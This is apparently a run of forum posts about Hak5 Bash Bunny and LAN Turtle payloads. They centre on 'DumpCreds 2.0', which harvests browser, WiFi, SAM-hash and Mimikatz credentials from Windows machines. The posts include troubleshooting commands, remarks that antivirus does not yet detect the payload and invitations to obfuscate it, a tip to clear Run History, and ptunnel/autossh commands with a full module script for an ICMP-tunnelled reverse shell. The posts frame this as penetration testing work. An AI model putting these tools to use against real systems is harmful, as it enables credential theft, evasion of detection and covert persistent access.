qdba

- Can you ping 172.16.64.1 - Try the attached payload.txt. If it goes to red, smbserver.py is missing. If not, ssh to bunny while purple LED blinks slow. 1. enter command at Terminal ps -ef | grep smb As result there should be a line like root 741 1 3 01:00 ? 00:00:27 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch1 2. enter command at Terminal mount |grep udisk As result there should be a line like /dev/nandf on /root/udisk type vfat (rw,relatime,fmask=0022,dmask=0022,codepage=cp437,iocharset=ascii,shortname=mixed,errors=continue) WIll the second powershell command fired up successfully - check cmd Window (I switched it to B&W in the payload) Have you tried it at second Computer payload.txt

My ideas coming with next Version..... paralellize Creds gathering with PS while Bashbunny is waiting for Target finishing the scripts it can do some other nice work. i.e. nmap the target. (any other ideas) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Domain Passwords try to get some more information about the AD Domain

Could you check that File and printer sharing is enabled in your Firewall.

While Purple blinking Slow , coud you reach \\172.16.64.1\e with windows explorer?

@LowValueTarget At the moment MS Defender and Avira Antivir don't detect it. But I'm sure in 1 or 2 days they will :- Feel free to obfuscate the code if you want. I won't publish some encoded or obfuscated code here in this forum. If I do so, I'm sure some Anti-Virus Tools will detect it in 1 or 2 days.

DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1

Good Work, I had the same idea because I'm pentesting a company who had forbidden USB Storage and Internet access per Policy. They have a good firewall with contenfilter and only a few Internet pages will be allowed. So you saved me a lot of time coding the stuff... Thank you .... One idea... .... the whole QUACK stuff takes a lot of time. To save attack time put a lot of the QUACK code into the powershellcode. I had done it with your CredDump Payload. https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds Only a suggestion. You do a really good work anyway.

Good stuff. Did some changes to your script like - Minimize Powershell windows - Dump WiFi creds - Clear Run History https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt

At the moment if you have ATTACKMODE RNDIS_ETHERNET STORAGE or ATTACKMODE RNDIS_ETHERNET HID the RNDIS Driver must be installed manually in windows. So this Combination is not really easy useable for attack vectors. My idea is ATTACKMODE HID ....... ......start some scripts on windows >>>> windows script wait for comming up the IP 172.16.64.1 ........ ATTACKMODE RNDIS_ETHERNET ...... ....... Script on windows detect the upcoming interface and go on with work ....... Theoretcally it schoud work

Yes its's really bad, that the driver must installed manually if you have ATTACKMODE RNDIS_ETHERNET <STORAGE | HID> While most compannies block USB Storage devices, it would be nice if we will have a server (impackets smbserver.py or python SimpleHTTPServer) running on bash bunny and HID for downloading and running code with i.e. powershell.

Hi Try /pentest/impacket/examples/smbserver.py tmp /tmp/ >> O.txt & With "&" the server runs in background mode so the script will move on.

had the sam issue..

Yes, have the same issue.

Hi, OK Ist an older thread, but I had the same Problem a few days ago. So I did some investigations and solved it. The Problem was that there is no Input field for the port of the host the ssh connection is established to. The manual way.......works for me. On the SSH Host Start ptunnel at the host (IP: xxx.xxx.xxx.xxx) --> /usr/sbin/ptunnel -daemon /tmp/ptunnel.pid On LAN-Turtle ptunnel -p xxx.xxx.xxx.xxx -lp 8000 -da xxx.xxx.xxx.xxx -dp 22 autossh -M 0 -i /root/.ssh/id_rsa -N -T -R 2222:localhost:22 user@localhost -p 8000 ...... user@localhost -p 8000 --> user ist the ssh user on the host xxx.xxx.xxx.xxx --> -p 8000 ist the port where ptunnel is waiting for the packets sending them to xxx.xxx.xxx.xxx with ICMP I did some changes at the autossh module so you configure them with turtle menu #!/bin/bash /usr/lib/turtle/turtle_module VERSION="1.2" DESCRIPTION="AutoSSH maintains persistent secure shells" CONF=/tmp/autossh.form : ${DIALOG_OK=0} : ${DIALOG_CANCEL=1} : ${DIALOG_HELP=2} : ${DIALOG_EXTRA=3} : ${DIALOG_ITEM_HELP=4} : ${DIALOG_ESC=255} function start { autossh_host=$(uci show autossh.@autossh[0].ssh | awk '{print $7}' | sed 's/@/ /g' | awk '{print $2}') touch /root/.ssh/known_hosts if grep $autossh_host /root/.ssh/known_hosts; then /etc/init.d/autossh start else echo "$autossh_host not in known_hosts" fi } function stop { /etc/init.d/autossh stop } function status { if pgrep autossh > /dev/null; then echo "1"; else echo "0"; fi } function configure { if [ -s /etc/config/autossh ] then autossh_host=$(uci show autossh.@autossh[0].ssh | awk '{print $7}') autossh_port=$(uci show autossh.@autossh[0].ssh | awk '{print $9}') autossh_remoteport=$(uci show autossh.@autossh[0].ssh | awk '{print $6}' | sed 's/:/ /g' | awk '{print $1}') autossh_localport=$(uci show autossh.@autossh[0].ssh | awk '{print $6}' | sed 's/:/ /g' | awk '{print $3}') else touch /etc/config/autossh fi dialog --ok-label "Submit" \ --help-button \ --title "AutoSSH Configuration" \ --form "AutoSSH (Persistent Secure Shell)\n\n\ User@Host: User and Host to establish the SSH tunnel\n\ Port: Port of the Host to establish the SSH tunnel\n\ Remote Port: Remote port to bind through the SSH tunnel\n\ Local Port: Local port to bind tunnel (Default 22)\n \n" 16 60 4\ "User@Host:" 1 1 "$autossh_host" 1 14 48 0 \ "Port:" 2 1 "$autossh_port" 2 14 48 0 \ "Remote Port:" 3 1 "$autossh_remoteport" 3 14 48 0 \ "Local Port:" 4 1 "$autossh_localport" 4 14 48 0 \ 2>$CONF return=$? case $return in $DIALOG_OK) cat $CONF | { read -r autossh_host read -r autossh_port read -r autossh_remoteport read -r autossh_localport touch /etc/config/autossh uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -N -T -R "$autossh_remoteport":localhost:"$autossh_localport" "$autossh_host" -p "$autossh_port"" uci commit autossh rm $CONF };; $DIALOG_CANCEL) rm $CONF clear exit;; $DIALOG_HELP) dialog --title "Help" \ --msgbox "\ AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-establish by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.\n \n\ Host - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.\n \n\ Port - The port number from which the remote server will bind.\n \n\ Listen Port - The port number to which the remote port will bind.\n \n\ Example: Per the defaults, the server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the remote host, and then from the remote host establishing an SSH connection to port 2222.\n \n\ For a video walkthrough, please watch h**ps://www.youtube.com/watch?v=J798iStWLOM&index=1&list=PLAC30AB8C5D17FCB5 - Hak5 Explaining NAT Traversal with SSH proxies.\ " 20 60 configure ;; $DIALOG_ESC) clear;; esac } Module Configuration: Module ptunnel: PTunnel Host: xxx.xxx.xxx.xxx Local Port: 8000 Dst. Host: xxx.xxx.xxx.xxx Dst. Port: 22 Module autossh: User@Host: user@localhost Port: 8000 Remote Port: 2222 Local Port: 22 enjoy it.... QDBA